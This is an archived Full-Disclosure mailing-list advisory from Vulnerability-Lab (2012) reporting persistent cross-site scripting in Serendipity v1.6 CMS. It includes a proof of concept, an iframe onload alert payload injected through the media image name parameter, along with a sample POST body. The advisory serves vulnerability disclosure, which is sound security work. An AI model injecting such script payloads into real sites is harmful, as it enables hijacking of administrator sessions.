lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 12 May 2012 11:51:44 +0200
From: Research <research@...nerability-lab.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Serendipity v1.6 CMS - Multiple Web
	Vulnerabilities

Title:
======
Serendipity v1.6 CMS - Multiple Web Vulnerabilities


Date:
=====
2012-05-05


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=535


VL-ID:
=====
535


Common Vulnerability Scoring System:
====================================
5


Introduction:
=============
Serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich 
and open source (BSD License). Serendipity is constantly under active development, with a team of 
talented developers trying to make the best PHP powered blog on the net. Serendipity has so far 
also proven 100% PHP5 compatible. Serendipity is a PHP-powered weblog application which gives the 
user an easy way to maintain an online diary, weblog or even a complete homepage. While the default 
package is designed for the casual blogger, Serendipity offers a flexible, expandable and easy-to-use 
framework with the power for professional applications.

(Copy of the Vendor Homepage: http://www.s9y.org )


Abstract:
=========
A Vulnerability Laboratory researcher discovered multiple web vulnerabilities in Serendipity v1.6 Content Management System.


Report-Timeline:
================
2012-05-05:	Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistent input validation vulnerabilities are detected in Serendipity v1.6 Content Management System. The bugs 
allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires 
low user inter action. Attackers can inject malicious strings as author name to execute them when an admin is processing to preview, review 
or manage the listing of users. The bug is located on application side & the execution is persistent out of the user management web 
application context.

Vulnerable Module(s):
				[+] Media - Image Name & Display

Picture(s):
				../1.png
				../2.png


Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ..

Vulnerable: http://127.0.0.1:8080/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Affected: http://127.0.0.1:8080/serendipity/a

Review: Image Name Display - Media
<ul><li><div class="image_add"><b>Adding image...</b></div></li><li>File was not located on the remote 
server, are you sure the URL: <b>"><iframe src="a" onload='alert("VL")' <<="" b=""> is correct?</li></ul></div>

    <!-- EXTERNAL MEDIA END -->

</div>
</body>
</html>
</iframe></b></li></ul>


POST: IMAGE UPLOAD + NAME

serendipity[old_session]=1vspimicug4mg0glab25l15q92;

serendipity[author_token]=4732db2a5cc1ee1b1fa39f2fd010a417e0d2d87e;

serendipity[userDefLang]=en;
serendipity[sortorder_perpage]=;

serendipity[sortorder_order]=;

serendipity[sortorder_ordermode]=;

serendipity[only_path]=iframesrcaonloadalertVL;     	<=
serendipity[only_filename]=;

serendipity[entrylist_filter_author]=;

serendipity[entrylist_filter_category]=;

serendipity[entrylist_filter_isdraft]=;

serendipity[entrylist_sort_perPage]=;

serendipity[entrylist_sort_ordermode]=;

serendipity[entrylist_sort_order]=;

serendipity[addmedia_directory]=;

__utma=87180614.499031553.1335326742.1335427622.1335434663.3;

__utmc=87180614;
__utmz=87180614.1335326742.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__gads=ID=4edf2e1e70d6571e:T=1335326758:S=ALNI_MZ40f1i0Ac4MSfN7hpqBqzaNtJIlA;

gs_u=1661731922:3115:9169:1335436134683;

__utmb=87180614.4.10.1335434663;
LThttpxxxcomlifetype=e1c0opti2n6u8apo30qhgrrdq2;
PHPSESSID=p4gs3t31a4bvjnsibk7284mhv2;
s9y_6ee12d7870b99d9e22c04f0f96d39992=1vspimicug4mg0glab25l15q92



Risk:
=====
The security risk of the persistent input validation vulnerability are estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (rem0ve@...nerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply.

Domains:	www.vulnerability-lab.com   - www.vuln-lab.com
Section:	video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Contact:	admin@...nerability-lab.com - support@...nerability-lab.com - irc.vulnerability-lab.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.

    						Copyright © 2012 Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@...nerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ